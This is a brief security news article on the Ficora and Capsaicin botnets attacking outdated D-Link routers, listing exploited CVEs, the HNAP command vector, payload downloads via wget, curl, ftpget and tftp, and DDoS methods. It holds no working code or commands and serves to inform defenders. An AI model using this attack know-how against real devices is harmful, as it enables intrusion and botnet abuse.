2 min Security

Malware botnets abuse outdated D-Link routers

Malware botnets abuse outdated D-Link routers

Two botnets, known as “Ficora” and “Capsaicin,” stepped up their activities to attack D-Link routers that are end-of-life or running on outdated firmware.

The attacks target popular D-Link models such as DIR-645, DIR-806, GO-RT-AC750, and DIR-845L. These devices are commonly used by individuals and organizations.

The malware exploits known vulnerabilities, such as CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112, among others. This gives attackers initial access to the devices being attacked. Once a device is compromised, attackers exploit D-Link Management Interface (HNAP) weaknesses and execute malicious commands via the GetDeviceSettings action.

These botnets can steal data and execute shell scripts. Criminals often deploy the botnets for large-scale Distributed Denial-of-Service (DDoS) attacks.

New variant of Mirai botnet

Ficora is a new variant of the infamous Mirai botnet, specifically modified to exploit weaknesses in D-Link devices.

According to Fortinet data, Ficora displays a random attack profile, with spikes in activity in October and November. After gaining access, Ficora uses a multi shell script to download and execute the payload via wget, curl, ftpget and tftp.

The malware includes a built-in brute force component with hard-coded login credentials to infect other Linux devices and supports multiple hardware architectures. Ficora uses UDP flooding, TCP flooding, and DNS amplification for its DDoS attacks.

Infection begins with download script

Capsaicin, a variant of the Kaiten botnet, is attributed to the Keksec group, which is known for malware such as EnemyBot. This botnet was active between Oct. 21 and 22 and mainly targeted East Asian countries.

The infection begins with a download script called “bins.sh,” which retrieves executable files (with the prefix ‘yakuza’) for architectures such as arm, mips, sparc and x86. Capsaicin is designed to identify and disable other active botnet payloads on the same host. In addition to its DDoS functionality, the botnet collects host information and sends it to the command-and-control (C2) server.

Tip: New Linux botnet exploits Log4j